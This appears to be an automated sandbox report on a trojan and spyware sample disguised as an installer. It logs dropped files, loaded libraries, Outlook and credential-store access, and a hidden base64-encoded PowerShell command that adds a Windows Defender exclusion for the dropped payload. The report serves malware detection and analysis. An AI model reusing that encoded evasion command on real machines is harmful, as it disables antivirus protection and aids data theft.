Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA3E6F0	9_2_00007FF6CFA3E6F0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA43618	9_2_00007FF6CFA43618
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA49510	9_2_00007FF6CFA49510
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA4B480	9_2_00007FF6CFA4B480
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA4C296	9_2_00007FF6CFA4C296
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA4E2E0	9_2_00007FF6CFA4E2E0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA492D0	9_2_00007FF6CFA492D0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA42290	9_2_00007FF6CFA42290
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA5A1E8	9_2_00007FF6CFA5A1E8
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA4E1F2	9_2_00007FF6CFA4E1F2
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA3B220	9_2_00007FF6CFA3B220
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA35140	9_2_00007FF6CFA35140
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA3C1B0	9_2_00007FF6CFA3C1B0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA37180	9_2_00007FF6CFA37180

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe 69F8CEA7A5B6E5DE711E9849F4BC0244F1344966364520BC12987F1B90013754

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: String function: 0000020933525330 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: String function: 00007FF6CFA367A0 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: String function: 000002093350B930 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: String function: 0000020933514C00 appears 41 times

Source: HZ1BUCfTne.exe, 00000000.00000000.1313515604.0000000004CD8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameInstaller_sharp.exe@ vs HZ1BUCfTne.exe
Source: HZ1BUCfTne.exe, 00000000.00000002.2389460218.000000000512E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs HZ1BUCfTne.exe
Source: HZ1BUCfTne.exe	Binary or memory string: OriginalFilenameInstaller_sharp.exe@ vs HZ1BUCfTne.exe

Source: classification engine

Classification label: mal87.troj.spyw.evad.winEXE@7/7@1/3

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933565970 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,		9_2_0000020933565970
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335B2008 AdjustTokenPrivileges,		9_2_00000209335B2008

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_000002093351C8C0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

9_2_000002093351C8C0

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_000002093354F1BE CoCreateInstance,

9_2_000002093354F1BE

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HZ1BUCfTne.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Mutant created: \Sessions\1\BaseNamedObjects\Mmm-A33C734061CA11EE8C18806E6F6E6963311B52DA
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe

File created: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r

Jump to behavior

Source: HZ1BUCfTne.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: HZ1BUCfTne.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: sUKFphHSzX.exe, 00000009.00000003.1688510293.000002093346C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\HZ1BUCfTne.exe "C:\Users\user\Desktop\HZ1BUCfTne.exe"
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process created: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe "C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe"
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process created: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe "C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe"	Jump to behavior

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Automated click: Next
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Automated click: Accept
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Automated click: Next
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Automated click: Accept
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Automated click: Next
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Automated click: Accept
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Automated click: Next
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Automated click: Accept
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Automated click: Next
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Automated click: OK
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Automated click: Accept
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Automated click: Next
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Automated click: OK
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Automated click: Accept

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: HZ1BUCfTne.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: HZ1BUCfTne.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: HZ1BUCfTne.exe

Static file information: File size 73555456 > 1048576

Source: HZ1BUCfTne.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4624400

Source: HZ1BUCfTne.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: HZ1BUCfTne.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Users\TonySoprano\Videos\cplus\test\sharp\Installer_sharp\obj\Release\Installer_sharp.pdb source: HZ1BUCfTne.exe

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==			Jump to behavior

Source: HZ1BUCfTne.exe

Static PE information: 0xB3B90B18 [Sun Jul 19 17:04:24 2065 UTC]

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_000002093351B820 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

9_2_000002093351B820

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Code function: 0_2_06E55E27 pushad ; iretd	0_2_06E55E41
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093355E874 push rbx; iretd	9_2_000002093355E875
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093355E89C push rbx; iretd	9_2_000002093355E89D
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA4E600 push rcx; iretd	9_2_00007FF6CFA4E601

